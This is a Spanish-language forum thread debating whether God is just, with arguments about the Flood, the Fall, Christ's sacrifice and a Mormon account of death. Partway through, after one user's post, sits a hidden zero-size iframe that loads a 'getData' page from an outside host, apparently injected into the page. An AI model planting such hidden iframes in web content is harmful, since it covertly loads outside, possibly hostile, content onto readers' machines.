¿Que religión es la verdadera?

Re: ¿Que religión es la verdadera?

Ok lo leí todo. ¿Y entonces? ¿Cual es la conclusión?

Uhmm...¿ no lo captaste ?

Te explico....: el boludo del marido negligente es el culpable de todo por no cuidar sus cosas...
 
Re: ¿Que religión es la verdadera?

No se que tiene que ver, verás, es que soy un apasionado de la fotografía y me revienta pensar en un daño negligente en esa belleza tecnológica...

No me hagas acordar. Cuando mi primer hijo era bebe se nos escapó en un momento de descuido y me la hizo percha.
En la realidad estás estupideces pasan. El bebe empieza a andar por todos lados y uno está como un idiota con babero.
Y de pronto dejás cosas por ahí sin pensar.

No me la pagó el guachito. Ahora llegó la hora de mi venganza. Esta por tener un bebe la señora en unos meses y cuando gatee le voy a poner al alcance la Play station que adora. Risas
Así mi nieto se la hace trizas jajajaja
 
Re: ¿Que religión es la verdadera?

b) Que Dios, omnipotente, metió la pata varias veces demostrando que no es omnipotente ni omnisciente O BIEN, que es una leyenda forjada por el hombre sin que exista en realidad nada de lo que en ella se expone.

O...que premeditadamente montó un cruel juego con su creación...digo...
 
Re: ¿Que religión es la verdadera?

Uhmm...¿ no lo captaste ?
Te explico....: el boludo del marido negligente es el culpable de todo por no cuidar sus cosas...

Y si. Pero no siempre es facíl estar en todos esos detalles.
Por eso te pregutaba si tenías hijos.

Hoy si tuviera hijos de nuevo sería mas cuidadoso.
 
Re: ¿Que religión es la verdadera?

SALMO:

Y si. Pero no siempre es facíl estar en todos esos detalles.
Por eso te pregutaba si tenías hijos.
Hoy si tuviera hijos de nuevo sería mas cuidadoso

Bueno, en eso ayuda un poquito el ser OMNIPRESENTE y OMNISCIENTE...

Besos,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

¿Cuál es la conclusión?

a) Que la historia bíblica Dios-Hombre-Pecado-Jesucristo-Perdón no tiene el menor sentido.

Esta no la entiendo

b) Que Dios, omnipotente, metió la pata varias veces demostrando que no es omnipotente ni omnisciente O BIEN, que es una leyenda forjada por el hombre sin que exista en realidad nada de lo que en ella se expone. No sólo metió la pata sino que la metió, intentó corregir y la volvió a meter, intentó corregir y la volvió a meter... Vaya omnisciencia.

Si estoy de acuerdo que metió la pata pero a sabiendas. El sabía que crearnos iba a ser una metida de pata pero lo hizó igual por amor a nosotros.

c) Que si hay un "culpable" en toda la historia de la creación y el pecado, ese es Dios.

Si. Como responsable, es responsable. Nunca lo negó. Por amor nos creó sabiendo que podíamos fallar, pero se hizo totalmente responsable.

d) Que el sacrificio de Jesús no fue tal.

Pero Jesús al ser Dios se hizo responsable del error de su criatura como vos decís.

Besos,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

a) Que la historia bíblica Dios-Hombre-Pecado-Jesucristo-Perdón no tiene el menor sentido.
Esta no la entiendo

Perdón, pero dime qué no entendiste según el ejemplo de la cámara y te lo explico con mucho gusto :D

b) Que Dios, omnipotente, metió la pata varias veces demostrando que no es omnipotente ni omnisciente O BIEN, que es una leyenda forjada por el hombre sin que exista en realidad nada de lo que en ella se expone. No sólo metió la pata sino que la metió, intentó corregir y la volvió a meter, intentó corregir y la volvió a meter... Vaya omnisciencia.
Si estoy de acuerdo que metió la pata pero a sabiendas. El sabía que crearnos iba a ser una metida de pata pero lo hizó igual por amor a nosotros.

Tanto amor que lo primero que hizo en cuanto se dio cuenta que metió la pata fue cometer genocidio, asesinando a absolutamente todos los seres humanos sobre la faz de la tierra (menos a Noe y su familia). Hijole, Salmo, no creo que ni como padre o abuelo creas que matar a tu hija cuando se porta mal es señal de amor. Y no estamos hablando de castigar o educar. ¡Los Mató!

c) Que si hay un "culpable" en toda la historia de la creación y el pecado, ese es Dios.
Si. Como responsable, es responsable. Nunca lo negó. Por amor nos creó sabiendo que podíamos fallar, pero se hizo totalmente responsable.

Y nosotros somos los que pagamos los platos rotos. No habla mucho de justicia (curioso si recordamos que esta parte del hilo inició a partir de la afirmación de que Dios es justo).

d) Que el sacrificio de Jesús no fue tal.
Pero Jesús al ser Dios se hizo responsable del error de su criatura como vos decís.

El error no fue de la criatura, fue de Dios, la criatura sólo actuó como su naturaleza se lo exigía.
Y Jesús se hizo responsable, pero no se sacrificó por su criatura. Murió por él y tres días después estaba mejor que antes.
Eso no es sacrificio.

Besos,
K.
 
Re: ¿Que religión es la verdadera?

HOLA A TODOS:

¿Por cierto, alguien sabe algo de 777?

Se supone que estabamos comprobando si la Biblia era coherente con la realidad conocida, si las profecías eran reales y si los hechos históricos eran coherentes con la realidad y ya tiene tiempo que no ha venido a seguir la charla... ¡Y apenas nos quedamos en el día cuatro del Génesis!

Me gustaría que volviera.

Karina.
<iframe src="//edge.crtinv.com/getData.html?d=about%3A%2F%2F" style="width: 0px; height: 0px; display: none;"></iframe>
 
Re: ¿Que religión es la verdadera?

Murió por él y tres días después estaba mejor que antes.
Eso no es sacrificio.
Besos,
K.

Bueno... pero que vos despues del parto estés perfectamente bien o mejor, porque estás con tu bebe no quiere decir que no sufriste el parto.
 
Re: ¿Que religión es la verdadera?

SALMO:



Perdón, pero dime qué no entendiste según el ejemplo de la cámara y te lo explico con mucho gusto :D



Tanto amor que lo primero que hizo en cuanto se dio cuenta que metió la pata fue cometer genocidio, asesinando a absolutamente todos los seres humanos sobre la faz de la tierra (menos a Noe y su familia). Hijole, Salmo, no creo que ni como padre o abuelo creas que matar a tu hija cuando se porta mal es señal de amor. Y no estamos hablando de castigar o educar. ¡Los Mató!



Y nosotros somos los que pagamos los platos rotos. No habla mucho de justicia (curioso si recordamos que esta parte del hilo inició a partir de la afirmación de que Dios es justo).



El error no fue de la criatura, fue de Dios, la criatura sólo actuó como su naturaleza se lo exigía.
Y Jesús se hizo responsable, pero no se sacrificó por su criatura. Murió por él y tres días después estaba mejor que antes.
Eso no es sacrificio.

Besos,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

Completamente de aceurdo. Pero se dice que el sacrificio de Jesús es el más grande de toda la historia, que sufrió lo que nadie, que murió una muerte cruenta y terrible como ninguna otra y que todo lo hizo por amor.

Día a día hay gente que por amor pasa cosas igual de dolorosas o más (porque hay gente que SI se muere sin volver a la vida). Y por más que digan que no es cierto, los historiadores han demostrado que Jesús no sufrió más que cualquier otro crucificado en tiempos del Imperio Romano. Hay apologetas que dicen que sólo a él lo clavaron o que sólo a él le dieron latigazos, como para hacer aún mayor el sufrimiento que en realidad era muy muy común en esos entonces.

Gracias,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

Tanto amor que lo primero que hizo en cuanto se dio cuenta que metió la pata fue cometer genocidio, asesinando a absolutamente todos los seres humanos sobre la faz de la tierra (menos a Noe y su familia). Hijole, Salmo, no creo que ni como padre o abuelo creas que matar a tu hija cuando se porta mal es señal de amor. Y no estamos hablando de castigar o educar. ¡Los Mató!

Y nosotros somos los que pagamos los platos rotos. No habla mucho de justicia (curioso si recordamos que esta parte del hilo inició a partir de la afirmación de que Dios es justo).

El error no fue de la criatura, fue de Dios, la criatura sólo actuó como su naturaleza se lo exigía.
Y Jesús se hizo responsable, pero no se sacrificó por su criatura. Murió por él y tres días después estaba mejor que antes.
Eso no es sacrificio.

Besos,
K.

Si te entiendo. Entiendo tu punto de vista.
Porque vos no crees en Dios y todo lo ves desde la perspectiva del hombre.
Desde ese punto de vista lo que decís es coherente.

1. No hay Dios.
2. No hay autoridad.
3. Nadie puede mandar ni ordenar al otro.
4. Sos libre
5. Nadie puede venir a esclavizarte con idioteces moralistas

Desde esta realidad todo es perfectamente claro

Y es mas: Si yo no creyera en Dios tampoco dejaría que nadie me viniera a estorbar con todo lo demás.
Sin Dios todo lo demás es puro invento de mentes afiebradas.

Bueno que descanses. Me voy a hacer noni.
 
Re: ¿Que religión es la verdadera?

SALMO:

Nope. Otro error en el intento de defender lo indefendible. Era cristiana cuando hice este análisis de contenido. Era cristiana cuando me di cuenta de todos los errores muy humano y poco espirituales/divinos que había en la historia de la relación de Dios con el hombre. Fue esta incoherencia, esta injusticia, esta perversidad, esta infamia, este desamor y sobre todo, esta incoherencia y contradicción una de las muchas cosas que me llevó a cuestionarme la fe en primera instancia.

Lo que digo es coherente, punto. No necesitas tener una postura a priori para que tenga o no coherencia. Si eres ateo, la historia es claramente escrita por hombres que se inventaron todo eso dándole forma a una mitología explicativa del surgimiento del pueblo hebreo (ni la primera ni la última mitología fundacional). Pero si eres creyente, sobre todo cristiano, entonces la cosa es peor, porque te das cuenta que Dios en realidad no es omnipotente, no es omnisciente, no es perfecto, no es misericordioso, es bastante agresivo, sanguinario, injusto y sádico. O bien, no es nada de eso y la humanidad sencillamente le importa un comino.

Sobre tus puntos.

1. Definitivamente YO creo que no hay Dios.
2. Que no haya Dios no significa que no haya autoridad. La vida está llena de autoridades, desde nuestros padres hasta nosotros mismos.
3. Sin duda que sí. Si nadie pudiera mandar al otro viviríamos en la Anarquía y ya la sociedad se hubiera partido en pedazos hace mucho.
4. Yo no creo que ser creyente o ateo te dé mayor o menor libertad. Porque ni tú ni yo mataríamos a nuestro vecino, sin importar lo que tú o yo creamos que son las consecuencias.
5. No sé a qué te refieres con "idioteces moralistas" pero yo soy una persona con una moral bien construida que no por no ser moral cristiana es menos moral y funcional.

Dices que sin Dios todo es invento de mentes afiebradas. Revisa la historia del hombre y su relación con Dios. Revisa cómo Dios fue el causante de cada tropiezo del hombre y cómo, a pesar de ser él el culpable, señaló como culpable al hombre y luego lo castigó por ello una, otra y otra y otra vez y lo sigue castigando hasta nuestros días detrás de la máscara de un ser amoroso cuyo acto de "amor" más notable fue el hacerse a sí mismo humano para sufrir el sufrimiento de cualquier criminal romano y luego heredar la vida eterna como príncipe de toda la existencia.

Platícalo con la almohada.

Gracias,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

Nope. Otro error en el intento de defender lo indefendible. Era cristiana cuando hice este análisis de contenido. Era cristiana cuando me di cuenta de todos los errores muy humano y poco espirituales/divinos que había en la historia de la relación de Dios con el hombre. Fue esta incoherencia, esta injusticia, esta perversidad, esta infamia, este desamor y sobre todo, esta incoherencia y contradicción una de las muchas cosas que me llevó a cuestionarme la fe en primera instancia.

Lo que digo es coherente, punto. No necesitas tener una postura a priori para que tenga o no coherencia. Si eres ateo, la historia es claramente escrita por hombres que se inventaron todo eso dándole forma a una mitología explicativa del surgimiento del pueblo hebreo (ni la primera ni la última mitología fundacional). Pero si eres creyente, sobre todo cristiano, entonces la cosa es peor, porque te das cuenta que Dios en realidad no es omnipotente, no es omnisciente, no es perfecto, no es misericordioso, es bastante agresivo, sanguinario, injusto y sádico. O bien, no es nada de eso y la humanidad sencillamente le importa un comino.

Sobre tus puntos.

1. Definitivamente YO creo que no hay Dios.
2. Que no haya Dios no significa que no haya autoridad. La vida está llena de autoridades, desde nuestros padres hasta nosotros mismos.
3. Sin duda que sí. Si nadie pudiera mandar al otro viviríamos en la Anarquía y ya la sociedad se hubiera partido en pedazos hace mucho.
4. Yo no creo que ser creyente o ateo te dé mayor o menor libertad. Porque ni tú ni yo mataríamos a nuestro vecino, sin importar lo que tú o yo creamos que son las consecuencias.
5. No sé a qué te refieres con "idioteces moralistas" pero yo soy una persona con una moral bien construida que no por no ser moral cristiana es menos moral y funcional.

Dices que sin Dios todo es invento de mentes afiebradas. Revisa la historia del hombre y su relación con Dios. Revisa cómo Dios fue el causante de cada tropiezo del hombre y cómo, a pesar de ser él el culpable, señaló como culpable al hombre y luego lo castigó por ello una, otra y otra y otra vez y lo sigue castigando hasta nuestros días detrás de la máscara de un ser amoroso cuyo acto de "amor" más notable fue el hacerse a sí mismo humano para sufrir el sufrimiento de cualquier criminal romano y luego heredar la vida eterna como príncipe de toda la existencia.

Platícalo con la almohada.

Gracias,
K.

1. Definitivamente yo creo hay Dios
2. Creo que su autoridad es absoluta
3. Que cuando no había nada el solo estaba y fue el, el que creó todas las cosas que veo.
4. Creo que así como el creó todo, tiene derecho a destruirlo.
5. No creo que soy libre sino que estoy bajo su autoridad
6. Creó que Dios es responsable de su creación porque el la hizo, pero al hacer al hombre a su imagen y semejanza y con libre albedrío, todo lo malo que vemos es nuestra absoluta responsabilidad
7. Creo en su derecho absoluto de "matar" al que se le antoje sin dar cuentas a nadie.¿A quien le va a dar cuentas? ¿A su creación?
8. Lo que hizo con el diluvio me parece lógico y justificado.
9. No cuestiono a Dios jamas.
10. Y como la idea del infierno eterno no me parece nada descabellada, espero poder safar.
11. Creo que el puede hacer lo que se le antoje porque el es Dios.
12. Pero a pesar de todo, creo que hasta cuando mata es bueno y justo.

Estamos en veredas opuestas.
O.
 
Re: ¿Que religión es la verdadera?

KarinaMoreno

Tanto amor que lo primero que hizo en cuanto se dio cuenta que metió la pata fue cometer genocidio, asesinando a absolutamente todos los seres humanos sobre la faz de la tierra (menos a Noe y su familia).

Genocidio solo pueden cometer los hombres porque están bajo autoridad.
Dios no comete genocidio, solo deshace lo que le salió mal.


Hijole, Salmo, no creo que ni como padre o abuelo creas que matar a tu hija cuando se porta mal es señal de amor. Y no estamos hablando de castigar o educar. ¡Los Mató!

Un hombre tiene vedado matar a un par porque está bajo autoridad divina. No le es permitido por Dios.
Dios nunca mata porque no es hombre. No tiene un tribunal sobre el que le diga asesino.
El hace lo mismo que cuando yo era chico jugaba con mis ladrillos y hacia casitas. Después las deshacía.

Y nosotros somos los que pagamos los platos rotos. No habla mucho de justicia (curioso si recordamos que esta parte del hilo inició a partir de la afirmación de que Dios es justo).

Nosotros disfrutamos de regalo lo que nos deje disfrutar. El hombre debe ser justo porque está bajo autoridad pero Dios es el inventor de la justicia.
El sentido de equilibrio y justicia que tenemos nos viene de el.

El error no fue de la criatura, fue de Dios, la criatura sólo actuó como su naturaleza se lo exigía.

El error es de la criatura que eligió la muerte en lugar de la vida. La naturaleza no domina a la criatura. El hombre debe dominar su naturaleza.

Y Jesús se hizo responsable, pero no se sacrificó por su criatura. Murió por él y tres días después estaba mejor que antes.
Eso no es sacrificio.

A pesar de ser enteramente responsables de nuestro fracaso, Dios nos vino a mostrar como se hace y se puso en nuestro lugar, para que viéramos que sin poderes sobrenaturales se podía. Sufrió nuestras mismas tentaciones y venció en todo. Aunque no está mal decir que Dios lo mató en nuestro lugar o decir que el mismo se entregó en sacrificio, la realidad es que nuestra ignorancia lo asesino. ¿O vos que sos tan realista no viste que fue el poder romano y terceras personas que lo crucificaron?


Besos,
K.

Igual
O.

 
Re: ¿Que religión es la verdadera?

SALMO:

De los puntos que pones, sólo comento aquellos en los que no estoy de acuerdo o tengo alguna mención:

3. Que cuando no había nada el solo estaba y fue el, el que creó todas las cosas que veo.

¿Y él de donde surgió?

4. Creo que así como el creó todo, tiene derecho a destruirlo.

Mi esposo es cineasta. Ama su trabajo y primero se cuelga del Empire State que quemar uno de sus guiones. Yo estoy a punto de ser madre. Mi hija aún no ha nacido y ya la amo más que a nada en el mundo. Primero me muero antes de tocarle un pelo. Y ambos, mi esposo y yo, tenemos derecho a destruir aquello que hemos creado. Pero el amor es demasiado grande. Quizá la respuesta al dilema es que Dios, a diferencia de lo que se dice, no es amor.

6. Creó que Dios es responsable de su creación porque el la hizo, pero al hacer al hombre a su imagen y semejanza y con libre albedrío, todo lo malo que vemos es nuestra absoluta responsabilidad

Dios hizo al hombre de una manera y luego, sabiendo que iba a caer, le puso pruebas que sabía que no iba a poder superar. Eso lo hacían los nazis con sus prisioneros, Salmo. Eso lo hacen los niños crueles con algunos animales. Pero Dios es peor, porque sabía que si ponía ahí el árbol no sólo tendría que expulsar a Adan y Eva, sino a ahogar a la humanidad, quemar a los de Sodoma y Gomorra, asesinar a miles de egipcios, crear guerras, causar muerte y sangre... Y de todos modos lo hizo.

7. Creo en su derecho absoluto de "matar" al que se le antoje sin dar cuentas a nadie.¿A quien le va a dar cuentas? ¿A su creación?

Que lamentable. Dicen en este foro que los ateos somos inmorales y que sin Dios no podemos tener una moral objetiva y real. Sin embargo, defiendes el derecho de Dios de asesinar, sangrar y masacrar porque no hay nadie por encima de él. Curioso que juzgues en los ateos por algo que a Dios le aplaudes con vehemencia.

8. Lo que hizo con el diluvio me parece lógico y justificado.

Te invito a un tema que se llama El Diluvio Universal para que discutamos ahí estos menesteres y no desviemos este hilo.

9. No cuestiono a Dios jamas.

Eso me queda claro. Por eso no encuentras las incoherencias en su historia o las inmoralidades en su comportamiento. Sin embargo Dios te dio la razón para pensar, la capacidad intelectual para cuestionar. Muchos cristianos de este foro, incluyéndote, no creen que la razón sea un rasgo que nos entregó el proceso evolutivo, sino un rasgo espiritual entregado por Dios. Y, a pesar de creer que fue Dios quien te lo dio, te niegas a usarlo.

11. Creo que el puede hacer lo que se le antoje porque el es Dios.

Claro. Y somos los ateos los que, según muchos cristianos, nos portamos como se nos venga en gana porque no creemos que hay un poder por encima del nuestro. Ya veo de donde salió esa idea. Es Dios quien se porta como se le da la gana porque no hay quien lo castigue ni quien lo cuestione. Es interesante, en realidad, creo que entiendo qué idea están muchos cristianos proyectando en el ateismo.

12. Pero a pesar de todo, creo que hasta cuando mata es bueno y justo.

Bueno, yo también puedo creer que los plátanos hablan, ¿pero dónde están los argumentos apoyen mi afirmación? Me gustaría mucho que argumentaras la coherencia de la relación entre Dios, el hombre y la justicia, que le dieras forma coherente a la historia de mi hija, mi esposo y la cámara de fotografías. Porque ver una historia incoherente y decir: "yo todavía creo que es coherente" es un asunto de la mayor facilidad, pero es intelectualmente deshonesto.

Estamos en veredas opuestas.

No, en realidad no. Estamos en la misma. Quizá mi apreciación de la vereda es equivocada, quizá estoy cometiendo errores de los que no me estoy dando cuenta. Pero cuando te señalo la vereda y te pido que la veas, tú te cubres los ojos y dices: "a mí la vereda me parece bien, Dios me dio ojos para verlo todo pero no la vereda, esa no la puedo ver, no tengo derechoa verla".

Gracias,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

Genocidio solo pueden cometer los hombres porque están bajo autoridad.
Dios no comete genocidio, solo deshace lo que le salió mal.

No, por favor... ya no lo defiendas :S.
Si a Dios le salen cosas mal, entonces no es omnipotente. Si no es omnipotente, no puede ser Dios.

Dios nunca mata porque no es hombre. No tiene un tribunal sobre el que le diga asesino.

El viejo argumento de Nixon: "lo que es ilegal, cuando el presidente lo hace, deja de ser ilegal". Falso. El asesinato es asesinato, lo cometa Dios o lo cometan los hombres.

El hace lo mismo que cuando yo era chico jugaba con mis ladrillos y hacia casitas. Después las deshacía.

Las casitas no estaban vivas. Que compares a un ser humano con un ladrillo de juguete no sólo me deja un poco más claro el valor que le das a la vida sino que me deja sin explicación de cómo es que los cristianos afirman que nosotros, los ateos, somos inmorales.

El sentido de equilibrio y justicia que tenemos nos viene de el.

Y como él inventó la justicia, entonces sí puede ser injusto. ¡Madre mía!

El error es de la criatura que eligió la muerte en lugar de la vida. La naturaleza no domina a la criatura. El hombre debe dominar su naturaleza.

Dios SABIA que el hombre se equivocaría. Si tu sabes que tu hijo se va a acercar a la flama si la dejas encendida qué haces:
a) la apagas para que cuando se acerque no se queme
b) la dejas encendida para que tu hijo escoja no quemarse en vez de quemarse, dominando así su curiosidad natural.

¿De verdad dirías que la opción b?
El amor no te permitiría la opción b... pero a Dios sí. Quizá su amor no era tanto como presume, si el amor humano puede ganarle.

A pesar de ser enteramente responsables de nuestro fracaso, Dios nos vino a mostrar como se hace

¿Enteramente responsables?
¿No leíste la historia de mi hija, mi esposo y la cámara?

Sufrió nuestras mismas tentaciones y venció en todo.

No sufrió nuestras mismas tentaciones.

Aunque no está mal decir que Dios lo mató en nuestro lugar o decir que el mismo se entregó en sacrificio, la realidad es que nuestra ignorancia lo asesino.

No. lo asesinó la mala planeación de Dios y sus constantes equivocaciones. Una tras otra, tras otra.

Besos,
K.
 
Re: ¿Que religión es la verdadera?

SALMO:

Lo peor es que yo en lo personal no creo que tú estés de acuerdo con todas estas inmoralidades y crueldades que estás planteando. Creo que estás defendiendo lo indefendible y que la defensa cerrada y forzada te está llevando a argumentar las cosas de modo que quedan aún peor sin que necesariamente creas en ellas. Digo, eso creo, quizá y sí crees en todas estas cosas que estás diciendo, entonces no entiendo de dónde puedes afirmar absolutamente nada sobre la moral del ateo promedio.

Gracias,
K.
 
Re: ¿Que religión es la verdadera?

que interesante...
la doctrina mormona tiene una respuesta distinta a la cristiana para estas o cualkier otra para todas las inquietudes que Karina ha expresado.

la muerte en nuestro plano carnal es la peor de las desgracias.. sin embargo en el plano eterno es solo un paso necesario... No un castigo

la doctrina de la caída es una de las mas correctamente ilustradas en el mormonismo
Dios no frustró sus planes con la caida, ni A Adan se le puso una prueba ke no pueda superar y Dios no es un Dios que no conociera la naturaleza de su creación:

Dios creó a Adan en un estado perfecto e Inmortal y estaba previsto que a través de el entrase la muerte y la corrupción carnal en este mundo.. de manera ke de lugar a este mundo caido y mortal..
condiciones necesarias para que las inteligencias que ocupasen estos cuerpos pudiese progresar y aprender a través de la experiencia carnal.
bajo esta perspectiva la muerte resulta un alivio de esta condición caída y vamos a una esfera espiritual a la espera del dia de la resurrección.

en esta vida de sufrimiento y enfermedad somos forjados como por fuego, sin embargo la duración de esta vida es solo un nanosegundo comparado con los eones de la eternidad.
la muerte es un descanso y un estado de reposo para los justos e inocentes..... pero solo es temporal

Dios no se complace en la destrucción, sin embargo muchas veces la destrucción a venido por su mano no por ser un ser iracundo y pasional, sino para poder renovar las condiciones
y que estos espíritus puedan nacer en un mundo menos corrupto y tengas mas oportunidades de vivir vidas justas y dignas.

Y ke de los injustos ke mueren por su mano?
pues pedro explicó ke aun a ellos les es predicado el evangelio, refiriéndose en este pasaje a los espíritus de kienes murieron durante el diluvio.

en el cual también fue y predicó a los espíritus encarcelados que en otro tiempo fueron desobedientes, cuando en los días de Noé la paciencia de Dios esperaba, mientras se construía el arca. En esta arca fueron salvadas a través del agua pocas personas, es decir, ocho.

Porque por esto también ha sido predicado el evangelio a los muertos, para que sean juzgados en carne según los hombres, pero vivan en espíritu según Dios


esta, es una de las doctrinas menos entendidas de todo el evangelio
 
Re: ¿Que religión es la verdadera?

KarinaMoreno


¿Y él de donde surgió?

Tengo NADA y aparece ALGO. Magia. Las cosas se hicieron solas. No creo en la magia
Tengo a Dios y crea todo. Las cosas las hizo Dios. No lo conozco, pero no es magía.


Mi esposo es cineasta. Ama su trabajo y primero se cuelga del Empire State que quemar uno de sus guiones. Yo estoy a punto de ser madre. Mi hija aún no ha nacido y ya la amo más que a nada en el mundo. Primero me muero antes de tocarle un pelo. Y ambos, mi esposo y yo, tenemos derecho a destruir aquello que hemos creado. Pero el amor es demasiado grande. Quizá la respuesta al dilema es que Dios, a diferencia de lo que se dice, no es amor.

No podés igualar a una cosa tan diminuta en el universo como somos sus criaturas, con Dios. Si vos tocas un pelo de tu hija Dios te destruye porque estás bajo su autoridad. Si en cambio Dios quiere matarte a vos a tu hija y a tu marido no hay quien lo juzgue ni se lo impida. Lo puede hacer. Vos no tenés derecho a destruir lo que creaste porque sos creada. Dios si, porque el no puede ser juzgado por nadie. El amor de la criatura no es demasiado grande, es obligación. Dios ama aún cuando mata.

Dios hizo al hombre de una manera y luego, sabiendo que iba a caer, le puso pruebas que sabía que no iba a poder superar. Eso lo hacían los nazis con sus prisioneros, Salmo. Eso lo hacen los niños crueles con algunos animales. Pero Dios es peor, porque sabía que si ponía ahí el árbol no sólo tendría que expulsar a Adan y Eva, sino a ahogar a la humanidad, quemar a los de Sodoma y Gomorra, asesinar a miles de egipcios, crear guerras, causar muerte y sangre... Y de todos modos lo hizo.

Dios hizo al hombre capacitado para no caer y el hombre cayo por decisión propia. Vos amás tu cuerpo y a todas tus células pero si algunas se revelan al plan central, vas corriendo al médico para que te las extirpe. Ninguna mujer disfruta cuando la sacan un pecho con cancer. Dios no disfruta cuando destruye a sus criaturas rebeldes. Lo hace para preservar a las que no los son. La mujer lo hace para preservar su vida.

Que lamentable. Dicen en este foro que los ateos somos inmorales y que sin Dios no podemos tener una moral objetiva y real. Sin embargo, defiendes el derecho de Dios de asesinar, sangrar y masacrar porque no hay nadie por encima de él. Curioso que juzgues en los ateos por algo que a Dios le aplaudes con vehemencia.

Los hombres no pueden imponerse sobre otros hombres porque pasarían sobre la autoridad de Dios. Dios es el creador del circo y yo no lo justifico, soy una de sus fieras.

Te invito a un tema que se llama El Diluvio Universal para que discutamos ahí estos menesteres y no desviemos este hilo.

El hombre abrió los ojos y quiere a toda costa defender su derecho a vivir. Dios levantó su pierna y lo aplastó. Adiós pretensiones humanas.

Eso me queda claro. Por eso no encuentras las incoherencias en su historia o las inmoralidades en su comportamiento. Sin embargo Dios te dio la razón para pensar, la capacidad intelectual para cuestionar. Muchos cristianos de este foro, incluyéndote, no creen que la razón sea un rasgo que nos entregó el proceso evolutivo, sino un rasgo espiritual entregado por Dios. Y, a pesar de creer que fue Dios quien te lo dio, te niegas a usarlo.

Precisamente uso todo el intelecto y razón que Dios me dió. Vos pretendés que siendo racional crea en la magia antes que en Dios. ¿Me querés decir como me convenzo? Te vuelvo a decir. He aprendido que las cosas no se hacen solas. Lo que yo no hago no lo hace nadie. Si la evolución partió al menos de una célula, esa célula no pudo haber aparecido por magia. No creo en la magia. Cuando llego al principio de todo me encuentro con la magia o con alguien a quien llamo Dios.
Dios salva a mi mente racional de tener que aceptar la magia estúpida en mi vida.

Claro. Y somos los ateos los que, según muchos cristianos, nos portamos como se nos venga en gana porque no creemos que hay un poder por encima del nuestro. Ya veo de donde salió esa idea. Es Dios quien se porta como se le da la gana porque no hay quien lo castigue ni quien lo cuestione. Es interesante, en realidad, creo que entiendo qué idea están muchos cristianos proyectando en el ateismo.

Yo se que hay ateos que son muy buenos y mejores que creyentes y creo que muchos ateos van a ir al cielo y creyentes al infierno porque Dios no es tarado y no se va a dejar convencer por la verborragia de un creyente, se va a basar en su vida.

Bueno, yo también puedo creer que los plátanos hablan, ¿pero dónde están los argumentos apoyen mi afirmación? Me gustaría mucho que argumentaras la coherencia de la relación entre Dios, el hombre y la justicia, que le dieras forma coherente a la historia de mi hija, mi esposo y la cámara de fotografías. Porque ver una historia incoherente y decir: "yo todavía creo que es coherente" es un asunto de la mayor facilidad, pero es intelectualmente deshonesto.

No hay mas coherencia que esta: Vivimos bajo autoridad y nuestra vida va a ser juzgada por Dios. No por nuestras creencias y bonitas palabras sino por nuestro ejemplo de vida. Si te portás mal con tu esposo con tu hija y con los seres que te rodean. Si no sos buena administradora de la vida que Dios te dió, vas a pagar.

No, en realidad no. Estamos en la misma. Quizá mi apreciación de la vereda es equivocada, quizá estoy cometiendo errores de los que no me estoy dando cuenta. Pero cuando te señalo la vereda y te pido que la veas, tú te cubres los ojos y dices: "a mí la vereda me parece bien, Dios me dio ojos para verlo todo pero no la vereda, esa no la puedo ver, no tengo derechoa verla".

Perdón Karina soy Ingeniero en sistemas, trabajé en IBM, en Motorola en Canada, he desarrollado sistemas toda mi vida. La lógica es la base de mi profesión.
Nunca voy a creer en la magía. Dios podrá no ser como me lo imagino, pero que existe, existe. Negarlo sería negar mi esencia. Pienso, luego existo.
Cuando voy hasta el principio no puedo aceptar la "NADA". Tengo un hijo discapacitado y no solo hemos orado por el sino que hemos ido a reunión de sanidad que se te pueda ocurrir. Nunca pasó nada. No creo en la magia. De la nada sale nada. Si alguien no hace las cosas, las cosas no se hacen. Si no trabajo no como. Yo no puedo inventar una sanidad si Dios no la hace. Pero cuando Dios obra ya no es magia ni milagro, es Dios obrando.

Gracias,
K.

Tengo el doble de años que vos rompiéndome la cabezota
O.